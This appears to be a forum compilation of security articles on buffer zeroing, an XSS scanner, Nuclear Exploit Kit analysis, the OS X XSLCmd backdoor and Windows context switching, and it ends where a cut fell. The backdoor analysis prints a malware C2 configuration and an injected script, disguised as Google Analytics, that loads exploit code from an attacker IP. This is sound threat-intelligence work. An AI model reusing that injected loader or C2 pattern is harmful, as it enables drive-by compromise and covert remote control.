Zeroing buffers is insufficient On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so — and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem. With a bit of care and a cooperative compiler, we can zero a buffer — but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers. Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2). Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault — but that is an extreme solution, and is both non-portable and very clear C "undefined behaviour".) One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications — so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set. It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak — the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES — but the situation is very different for decryption operations: The final block of output is plaintext, and the final AES round is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertantly keeps an AES key sitting in an XMM register long after it has been wiped from memory. As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code — which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine. Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C. If compiler authors care about security, we need a new C language extension. After discussions with developers — of both cryptographic code and compilers — over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that that compiler knows precisely how much space it has allocated. With such a feature added to the C language, it will finally be possible — in combination with memset_s from C11 — to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions. Sursa: Zeroing buffers is insufficient

Copyright Duarte Monteiro (etraud123) JSPwn Nishant Das Patnaik (nishant.dp@) JsPrime Paul Theriault (pauljt) Scanjs JSpwn JavaScript Static Code Analysis JSPwn is a modified version of Scanjs + JSPrime. This tool allow the developers to detect Sinks And Sources of their Applications and find XSS vulnerabilities and DOM XSS (Beta). With the engine of ScanJS to detect vulnerabilities and the code flux feature of JSprime, this app has the compatibility of detect the vulnerabilities point and backtrack the code. Example Open app: node server.js; Go to: http://localhost:4000/client/#/scan; Select File from folder; Enable REGEXP Custom; Link: https://github.com/Etraud123/JSpwn

[h=3]Nuclear Exploit Kit and Flash CVE-2014-0515[/h] For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit kit targets a number of known vulnerabilities including: pdf - PDF:Exploit.PDF-JS swf - CVE-2014-0515 jar - CVE-2012-0507 Below are the files which were downloaded during the exploitation attempts observed: [TABLE] [TR] [TD]FILE TYPE[/TD] [TD]MD5[/TD] [TD]SIZE[/TD] [TD]CVE/THREAT[/TD] [TD]VT HITS[/TD] [/TR] [TR] [TD]FLASH[/TD] [TD]A1465ECE32FA3106AA88FD666EBF8C78[/TD] [TD=align: right]5614[/TD] [TD]CVE-2014-0515[/TD] [TD]18 / 53[/TD] [/TR] [TR] [TD]JAR[/TD] [TD]A93F603A95282B80D8AFD3F23C4D4889[/TD] [TD=align: right]12396[/TD] [TD]CVE-2012-0507[/TD] [TD]26 / 54[/TD] [/TR] [TR] [TD]PDF[/TD] [TD]19ED55EF17A49451D8052D0B51C66239[/TD] [TD=align: right]9770[/TD] [TD]Exploit.PDF-JS[/TD] [TD]22 / 54[/TD] [/TR] [TR] [TD]EXE[/TD] [TD]8BCE8A59F9E789BEFB9D178C9A03FB66[/TD] [TD=align: right]104960[/TD] [TD]Win32/Zemot[/TD] [TD]39 / 53[/TD] [/TR] [/TABLE] Although there are other associated vulnerabilities that are being exploited by Nuclear Exploit kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515). Nuclear EK Landing Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and if finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a javascript function then checks the installed Flash version and if a vulnerable version is detected on the client's browser, a call is then made to a dynamic Flash object creation module. (Fig 4: Flash Call) Here are the vulnerable Flash player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below. CVE-2014-0515 exploit analysis Here is the code that dynamically creates a new Flash Object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard coded snippets of obfuscated shellcode in the action script as seen below: (Fig x1,x2: Raw Shellcodes) After de-obfuscating on the run time, it adds bytecode to a Shader Object from one of the de-obfuscated shell code snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed byte code is written, which triggers the vulnerability. Here is the Malformed byte code: (Fig 9: Malformed data for Pixel Shader) Disassembling Pixel Bender's byte code We used Tinc Uro's program to get the PixelBender binary data decompiled. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here. The Shader Object takes a float parameter whose default value is set to a matrix of 4x4 floats and the second float value of this matrix is invalid value triggering the vulnerability. Conclusion Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new Exploit Kits. Nuclear Exploit Kit definitely ranks in the Top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK includes: SocialBlade.com - A youtube statistics tracking site. AskMen.com - Men's entertainment website Facebook.com survey scam pages Exploit kits generally make use of known vulnerabilities and Flash is a popular target. CVE-2014-0515 in particular targets a Flash vulnerability in Flash versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It's critical to ensure that your employees aren't running outdated versions of Flash as it is commonly targeted by EKs. References: Adobe ActionScript® 3 (AS3) API Reference http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf kaourantin.net: Pixel Bender .pbj files JPEXS Free Flash Decompiler - Download Malware-Traffic-Analysis.net - Rubin Azad Sursa: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515

Forced to Adapt: XSLCmd Backdoor Now on OS X September 4, 2014 | By James T. Bennett and Mike Scott Introduction FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform. Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums. In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X. And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X. Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report. Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGO’s, especially those with interests in Asia. XSLCmd for OS X Analysis The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons). The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing. Installation Routine To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid()with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs. The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed. The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog. Configuration Options XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands. If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained. [ListenMode] 0 [MServer] 61.128.110.38:8000 [bServer] 61.128.110.38 [Day] 1,2,3,4,5,6,7 [start Time] 00:00:00 [End Time] 23:59:00 [interval] 60 [MWeb] http://1234/config.htm [bWeb] http://1234/config.htm [MWebTrans] 0 [bWebTrans] 0 [FakeDomain] www.appleupdate.biz [Proxy] 0 [Connect] 1 [update] 0 [updateWeb] not use [MServer] and [bServer] specify the main and backup C2 server addresses, which can be either an IP address or domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates on where Monday is 1. [start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [interval] specifies the number of seconds between polls. [MWeb] and [bWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left to their default: http://1234/config.htm Other options will be explained where appropriate later in the blog. C2 Protocol XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to setup the HTTP request or response headers depending on whether or not it was configured for [Listen Mode]. If [Listen Mode] is set to 1, then it listens on its socket, waiting for a connection for which it will reply to with HTTP response headers following this template: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Server: Apache/2.0.54 (Unix) Content-Encoding: gzip Content-Length: %d The body after the headers, regardless of mode, will contain data specific to the purpose of the communication. The data is encrypted with a scheme lifted from a game server engine written by a group named “My Destiny Team.” The request headers have an interesting feature where the Host and Referer header values will have their domain values populated with the value stored in [Fake Domain]. This value can be any string and has no effect on the network connection established. The value of the ‘s’ argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded. Another interesting feature exists for the configuration update function. If [MWebTrans]/[bWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo’s Babelfish service and will fall back to the Google Translate service if that fails. As you can see, the ‘trurl’ parameter in the URL will be set to whatever is configured for [MWeb]/[bWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end. SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [Listen Mode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases. Observations We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes side-by-side in the same function even. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes. Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash. The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code, the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6 released in 2009, and OS X 10.9 was released in October of 2013. Threat Actor Intelligence Historical Background While GREF’s targeting interests overlap with many of the other threat groups we track, their TTP’s are somewhat unique. GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks. GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits including CVE-2010-0806 (IE 6-7 Peer Objects vuln), CVE-2010-1297 (Adobe Flash vuln), and CVE-2010-2884 (Adobe Flash) that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites including Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did. Figure 1: Sample “google” exploit link <!— Google Tracking Code —> <script type=”text/javascript”> var gaJsHost = ((“https:” == document.location.protocol) ? “https://ssl.” : “http://”); document.write(unescape(“%3Cscript src=’” + gaJsHost + “180.149.252.181/wiki/tiwiki.ashx’ type=’text/javascript’%3E%3C/script%3E”)); </script> The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities to both gain entry to targeted organizations, as well as to get new platforms for SWC attacks. This threat group appears to devote more resources (than most other groups) in attempting to penetrate web servers, and generally, they make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system. Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges to both perform reconnaissance and launch their attacks, as well as for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom – Hong Kong), 180.149.252.x (Asia Datacenter – Hong Kong), and 120.50.47.x (Qala – Singapore). In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as “inurl” and “filetype” looking for specific systems, technologies, and known vulnerabilities. C2 Domains GREF is known to have sometimes configured their malware to bare IP addresses, rather than domains, but there are some clusters of domain registrants that we attribute to them. Table 1: GREF domain registrations [TABLE] [TR] [TD]Domain[/TD] [TD=width: 221]Registrant Email Address[/TD] [/TR] [TR] [TD=width: 221]allshell[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kasparsky[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kocrmicrosoft[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoft.org[.]tw[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftdomainadmin[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftsp3[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]playncs[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]softwareupdatevmware[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]windowsnine[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]cdngoogle[.]com[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]cisco-inc[.]net[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]mremote[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]officescan[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]oprea[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]battle.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]diablo-iii[.]mobi[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftupdate[.]ws[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msftncsl[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]square-enix[.]us[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]updatamicrosoft[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]powershell.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]gefacebook[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msnupdate[.]bz[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]googlemapsoftware[.]com[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [/TABLE] XSLCmd Usage For the majority of the time we’ve been tracking them, XSLCmd has been the “go-to” backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata. Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the “FakeDomain” was configured to “www.appleupdate[.]biz”, which was originally registered on August 2, 2012, and the registration appears to have updated on August 7, 2014, but the registrant is still the same “cast west”. When we found the sample on August 10, the domain did not resolve and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks, it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are ‘nxdomain’), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you’ll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain. Other Backdoor Usage In addition to XSLCmd, GREF has utilized a number of other backdoors over time. Another backdoor unique to them, which we call “ddrh”, is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010, but has not been seen much since. Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including the support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices. We have also observed GREF using a handful of other common backdoors including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the “AllShell” cluster (C2: smtp.allshell[.]net). Starting in mid-2012, GREF started using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post “An Analysis of PlugX,” are usually bundled into a RAR self-extracting executable and uses the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of “PST-2.0” when executed, and some have the shared “HT Applications” version metadata. Conclusion The “A” in APT is generally used to describe the threat actors as “Advanced”, but with this blog, we also see that they are also “Adaptable.” Not only have they adopted new Windows-based backdoors over time, as Apple’s OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match in order to gain and maintain a persistent foothold in the organizations they are targeting. OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users that utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and with users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform. Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research. Appendix 1: XSLCmd for OS X created files [TABLE=width: 100%] [TR] [TD=width: 56%]Filename[/TD] [TD=width: 43%]Purpose[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/clipboardd[/TD] [TD=width: 43%]executable[/TD] [/TR] [TR] [TD=width: 56%]/Library/Logs/clipboardd[/TD] [TD=width: 43%]executable when run as super user[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist[/TD] [TD=width: 43%]plist for persistence[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/pxupdate.ini[/TD] [TD=width: 43%]configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiska.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiskc.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log[/TD] [TD=width: 43%]key log file[/TD] [/TR] [/TABLE] Sursa: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog

Windows Internals - A look into SwapContext routine Hi, Here I am really taking advantage of my summer vacations and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum end context switching (a flowchart). However, the routine responsible for context switching itself wasn't discussed in detail and that's why I'm here today. Here are some notes that'll help us through this post : 1 - The routine which contains code that does context switching is SwapContext and it's called internally by KiSwapContext. There are some routines that prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves. 2 - The routines above (KiSwapContext and SwapContext) are implemented in ALL context switches that are performed no matter what is the reason of the context switch (preemption,wait state,termination...). 3 - SwapContext is originally written in assembly and it doesn't have any prologue or epilogue that are normally seen in ordinary conventions, imagine it like a naked function. 4 - Neither SwapContext or KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext which will actually perform the context-switch. Usually before calling KiSwapContext, the old irql (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql , but there's an exception discussed later in this article. So buckle up and let's get started : Before digging through SwapContext let's first start by examining what its callers supply to it as arguments. SwapContext expects the following arguments: - ESI : (PKTHREAD) A pointer to the New Thread's structure. - EDI : (PKTHREAD) A pointer to the old thread's structure. - EBX : (PKPCR) A pointer to PCR (Processor control region) structure of the current processor. - ECX : (KIRQL) The IRQL in which the thread was running before raising it to DISPATCH_LEVEL. By callers, I mean the KiSwapContext routine and some routines that call SwapContext directly (ex : KiDispatchInterrupt). Let's start by seeing what's happening inside KiSwapContext : This routine expects 2 arguments the Current thread and New thread KTHREAD pointers in ECX and EDX respectively (__fastcall). Before storing both argument in EDI and ESI, It first proceeds to save these and other registers in the current thread's (old thread soon) stack: EBP : The stack frame base pointer (SwapContext only updates ESP). EDI : The caller might be using EDI for something else ,save it. ESI : The caller might be using ESI for something else ,save it too. EBX : The caller might be using EBX for something else ,save it too. Note that these registers will be popped from this same thread's stack when the context will be switched from another thread to this thread again at a later time (when it will be rescheduled to run). After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]).Then it stores the CurrentThread->WaitIrql value in ECX, now that everything is set up KiSwapContext is ready to call SwapContext. Again, before going through SwapContext let me talk about routines that actually call SwapContext directly and exactly the KiDispatchInterrupt routine that was referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext ? Simply because it just needs to push EBP,EDI and ESI onto the current thread's stack as it already uses EBX as a pointer to PCR. Here, we can see a really great advantage of software context switching where we just save the registers that we really need to save, not all registers. Now , we can get to SwapContext and explain what it does in detail. The return type of SwapContext is a boolean value that tells the caller (in the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps: 1 - The first thing that SwapContext does is verify that the new thread isn't actually running , this is only right when dealing with a multiprocessor system where another processor might be actually running the thread.If the new thread is running SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running and after getting out of the loop, the Running boolean is immediately set to TRUE. 2 - The next thing SwapContext does is pushing the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13) SwapContext itself pops ECX later, but after the context switch. As a result we'll be popping the new thread's pushed IRQL value (stack switched). 3 - Interrupts are disabled, and PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, Interrupts are enabled again. 4 - increment the count of context switches in the PCR (Pcr->ContextSwitches++; ) , and push Pcr->Used_ExceptionList which is the first element of PCR (fs:[0]). fs:[0] is actually a pointer to the last registered exception handling frame which contains a pointer to the next frame and also a pointer to the handling routine (similar to usermode), a singly linked list simply. Saving the exception list is important as each thread has its own stack and thus its own exception handling list. 5 - OldThread->NpxState is tested, if it's non-NULL, SwapContext proceeds to saving the floating-points registers and FPU related data using fxsave instruction. The location where this data is saved is in the initial stack,and exactly at (Initial stack pointer - 528 bytes) The fxsave output is 512 bytes long , so it's like pushing 512 bytes onto the initial stack , the other 16 bytes are for stack-alignment I suppose.The Initial stack is discussed later during step 8. 6 - Stack Swapping : Save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running in the new thread's stack, from now on every value that we'll pop was previously pushed the last time when the new thread was preparing for a context-switch. 7 - Virtual Address Space Swapping : The old thread process is compared with the new thread's process if they're different CR3 register (Page directory pointer table register) is updated with the value of : NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different. 8 - TSS Esp0 Switching : Even-though I'll dedicate a future post to discuss TSS (task state segment) in detail under Windows , a brief explanation is needed here. Windows only uses one TSS per processor and uses only (another field is also used but it is out of the scope of this article) ESP0 and SS0 fields which stand for the kernel stack pointer and the kernel stack segment respectively. When a usermode to kernelmode transition must be done as a result of an interrupt,exception or system service call... as part of the transition ESP must be changed to point to the kernel stack, this 